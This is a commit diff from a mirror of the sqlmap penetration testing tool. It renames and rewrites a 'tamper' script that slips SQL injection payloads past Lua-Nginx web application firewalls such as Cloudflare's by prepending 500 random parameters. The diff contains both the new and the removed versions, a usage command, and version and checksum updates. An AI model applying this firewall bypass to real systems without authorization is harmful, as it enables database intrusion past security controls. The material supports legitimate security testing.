mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2024-11-25 02:53:46 +03:00
Another update related to the #3316
This commit is contained in:
parent
48b407c0fa
commit
f2035145fe
|
@ -566,7 +566,7 @@ Efrain Torres, <et(at)metasploit.com>
|
|||
* for his great Metasploit WMAP Framework
|
||||
|
||||
Jennifer Torres, <jtorresf42(at)gmail.com>
|
||||
* for contributing a tamper script luanginxwafbypass.py
|
||||
* for contributing a tamper script luanginx.py
|
||||
|
||||
Sandro Tosi, <matrixhasu(at)gmail.com>
|
||||
* for helping to create sqlmap Debian package correctly
|
||||
|
|
|
@ -19,7 +19,7 @@ from lib.core.enums import DBMS_DIRECTORY_NAME
|
|||
from lib.core.enums import OS
|
||||
|
||||
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
|
||||
VERSION = "1.2.10.31"
|
||||
VERSION = "1.2.10.32"
|
||||
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
|
||||
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
|
||||
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
|
||||
|
|
36
tamper/luanginx.py
Normal file
36
tamper/luanginx.py
Normal file
|
@ -0,0 +1,36 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
"""
|
||||
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||
See the file 'LICENSE' for copying permission
|
||||
"""
|
||||
|
||||
import string
|
||||
import random
|
||||
|
||||
from lib.core.enums import HINT
|
||||
from lib.core.enums import PRIORITY
|
||||
from lib.core.settings import DEFAULT_GET_POST_DELIMITER
|
||||
|
||||
__priority__ = PRIORITY.NORMAL
|
||||
|
||||
def tamper(payload, **kwargs):
|
||||
"""
|
||||
LUA-Nginx WAFs Bypass (e.g. Cloudflare)
|
||||
|
||||
Reference:
|
||||
* https://opendatasecurity.io/cloudflare-vulnerability-allows-waf-be-disabled/
|
||||
|
||||
Notes:
|
||||
* Lua-Nginx WAFs do not support processing of more than 100 parameters
|
||||
|
||||
>>> random.seed(0); hints={}; payload = tamper("1 AND 2>1", hints=hints); "%s&%s" % (hints[HINT.PREPEND], payload)
|
||||
'0U=&Aq=&Fz=&Ws=&DK=&4F=&rU=&Mp=&48=&Y3=&tT=&3Q=&Dg=&AL=&47=&D1=&qX=&Ia=&Sy=&ZP=&aE=&1p=&u1=&lJ=&o7=&XB=&et=&F5=&gI=&RH=&YH=&7L=&KB=&Kx=&Js=&lL=&OD=&fU=&25=&03=&5H=&yR=&rY=&03=&K6=&JB=&O9=&4X=&fL=&EN=&0p=&Th=&nX=&uY=&gj=&Rc=&J4=&HQ=&bN=&LJ=&yw=&8c=&b7=&lh=&nX=&6b=&Ag=&qn=&Ov=&lF=&cg=&9m=&wT=&Z4=&kP=&7d=&P0=&vp=&LB=&kD=&zJ=&Ft=&wZ=&pI=&aT=&uc=&ro=&7v=&rw=&6N=&MS=&yz=&Oa=&lu=&oN=&x2=&Jz=&yR=&zP=&cB=&qj=&GE=&IU=&2E=&tC=&Y2=&Yl=&9N=&fS=&9y=&Qt=&nS=&aZ=&Gg=&hO=&2r=&8g=&0y=&fr=&CX=&1i=&GO=&v2=&rb=&cQ=&I6=&64=&cU=&RO=&S3=&Nx=&Hm=&Ka=&ju=&WS=&uM=&ck=&8r=&yI=&sD=&oc=&lG=&ey=&uz=&g4=&D0=&8v=&DR=&As=&T3=&5M=&x8=&Ne=&fU=&da=&yG=&BE=&KQ=&Aw=&9q=&WA=&wd=&1R=&3B=&Ph=&ym=&c6=&nj=&mx=&Hj=&98=&jz=&Q2=&E4=&tE=&EP=&mL=&nv=&73=&Yc=&jp=&W0=&KS=&Ye=&f1=&cn=&ca=&0u=&jO=&8F=&3F=&JQ=&XU=&9U=&4m=&HL=&ZD=&Xy=&K0=&XO=&al=&Fp=&e1=&6s=&zY=&dN=&hr=&Zd=&cz=&E1=&SP=&j9=&zL=&xc=&Dj=&cM=&Ng=&Iv=&xW=&E2=&LC=&Nu=&hQ=&MW=&h4=&X4=&2Q=&YG=&Wl=&WB=&UC=&We=&c5=&E3=&6P=&Jn=&fY=&3W=&RA=&sh=&AJ=&56=&zg=&VT=&bB=&Qb=&47=&Se=&ew=&bv=&a8=&Ye=&3m=&mP=&6h=&aw=&bL=&1l=&gv=&7i=&7w=&Ds=&67=&Nl=&9g=&Kj=&36=&Xt=&pU=&sA=&ci=&be=&eA=&IT=&iA=&Nf=&Bw=&6d=&zT=&tm=&sD=&6X=&rI=&QX=&By=&VA=&pC=&6i=&CN=&Dm=&aR=&Ma=&sV=&MH=&jR=&DQ=&Vo=&Vr=&9h=&2c=&pG=&Ky=&gp=&rU=&4K=&cX=&sv=&Gp=&5k=&zr=&GJ=&MG=&zN=&zW=&Ws=&xM=&jR=&xK=&iP=&vD=&zD=&Rt=&Od=&sU=&dM=&bD=&3a=&Ge=&1Q=&UP=&ac=&M9=&2R=&To=&Ur=&gC=&uk=&A3=&AB=&RG=&i4=&BW=&yY=&yn=&m6=&Kd=&yo=&fl=&dN=&kL=&LR=&Fr=&2v=&CN=&F7=&75=&5K=&ER=&nq=&ck=&aO=&iW=&Q8=&y5=&Cv=&g2=&Xu=&Cu=&bc=&wm=&Gl=&mP=&Tt=&1p=&vS=&c5=&eC=&Sc=&Y8=&Ch=&fg=&Vz=&4B=&eA=&UZ=&cl=&Eh=&25=&tA=&Ir=&Hm=&sB=&LH=&qo=&hW=&gT=&pr=&TO=&TF=&1h=&Oh=&Tw=&PR=&On=&Zo=&GP=&oM=&rk=&YI=&uK=&bi=&y8=&Fe=&VW=&WJ=&Rn=&TY=&Vv=&KM=&3g=&ZG=&wC=&an=&OE=&7D=&t0=&qL=&RY=&Wx=&dc=&T7=&vB=&SO=&qP=&sw=&HT=&jb=&Mb=&cn=&Oe=&d8=&A3=&nA=&wk=&u9=&Ux=&zq=>=&QC=&c5=&zy=&ai=&1F=&Tj=&u0=&Yp=&bY=&kW=&Qk=&e5=&LM=&Cj=&Lp=&XT=&b5=&cf=&sj=&ow=&Tz=&qE=&yt=&3I=&8V=&Jq=&QC=&Sz=&Eb=&Tc=&QK=&Wr=&Qm=&Gv=&8m=&Ju=&85=&KS=&Qv=&43=&uU=&aY=&J7=&wM=&uW=&L9=&ai=&ch=&56=&D6=&YW=&Ul=&1 AND 2>1'
|
||||
"""
|
||||
|
||||
hints = kwargs.get("hints", {})
|
||||
delimiter = kwargs.get("delimiter", DEFAULT_GET_POST_DELIMITER)
|
||||
|
||||
hints[HINT.PREPEND] = delimiter.join("%s=" % "".join(random.sample(string.letters + string.digits, 2)) for _ in xrange(500))
|
||||
|
||||
return payload
|
|
@ -1,51 +0,0 @@
|
|||
#!/usr/bin/env python
|
||||
# -*- coding: utf-8 -*-
|
||||
|
||||
"""
|
||||
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||
See the file 'LICENSE' for copying permission
|
||||
"""
|
||||
|
||||
'''
|
||||
[+] LUA-Nginx WAFs Bypass (Cloudflare)
|
||||
Lua-Nginx WAFs doesn't support processing for more than 100 parameters.
|
||||
|
||||
Example: sqlmap -r file.txt --tamper=luanginxwafbypass.py --dbs --skip-urlencode -p vulnparameter
|
||||
Required options: --skip-urlencode, -p
|
||||
'''
|
||||
|
||||
import sys
|
||||
import string
|
||||
import random
|
||||
from lib.core.enums import PRIORITY
|
||||
from lib.core.data import conf
|
||||
__priority__ = PRIORITY.HIGHEST
|
||||
|
||||
''' Random parameter'''
|
||||
def randomParameterGenerator(size=6, chars=string.ascii_uppercase + string.digits):
|
||||
output = ''.join(random.choice(chars) for _ in range(size))
|
||||
return output
|
||||
|
||||
''' Tamper '''
|
||||
def tamper(payload, **kwargs):
|
||||
try:
|
||||
headers = kwargs.get("headers", {})
|
||||
randomParameter = randomParameterGenerator()
|
||||
parameter = conf["testParameter"][0]
|
||||
|
||||
if not parameter:
|
||||
print "\n[-] [ERROR] Add an injectable parameter with -p option (-p param)"
|
||||
sys.exit(0)
|
||||
|
||||
if conf["skipUrlEncode"] != True:
|
||||
print "\n[-] [ERROR] --skip-urlencode option must be activated"
|
||||
sys.exit(0)
|
||||
|
||||
# Add 500 parameters to payload
|
||||
luaBypass = ("&" + randomParameter + "=")*500 + "&"
|
||||
outputPayload = luaBypass + parameter + "=" + payload
|
||||
|
||||
return outputPayload
|
||||
except Exception as error:
|
||||
print error
|
||||
return None
|
|
@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py
|
|||
0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py
|
||||
a7db43859b61569b601b97f187dd31c5 lib/core/revision.py
|
||||
fcb74fcc9577523524659ec49e2e964b lib/core/session.py
|
||||
737cfceb9db54a600e3983ef350f939a lib/core/settings.py
|
||||
47482757115424a7155720ee7d3e0ced lib/core/settings.py
|
||||
dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py
|
||||
a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py
|
||||
47ad325975ab21fc9f11d90b46d0d143 lib/core/target.py
|
||||
|
@ -261,6 +261,7 @@ ef0639557a79e57b06296c4bc223ebef tamper/htmlencode.py
|
|||
1e5532ede194ac9c083891c2f02bca93 tamper/__init__.py
|
||||
2dc49bcd6c55f4e2322b07fa92685356 tamper/least.py
|
||||
40d1ea0796fd91cb3cdd602e36daed15 tamper/lowercase.py
|
||||
a54b361da0ac6988d0b97bc79463615d tamper/luanginx.py
|
||||
1c4d622d1c2c77fc3db1f8b3849467ee tamper/modsecurityversioned.py
|
||||
f177a624c2cd3431c433769c6eb995e7 tamper/modsecurityzeroversioned.py
|
||||
91b63afdb96b1d51c12a14cbd425d310 tamper/multiplespaces.py
|
||||
|
|
Loading…
Reference in New Issue
Block a user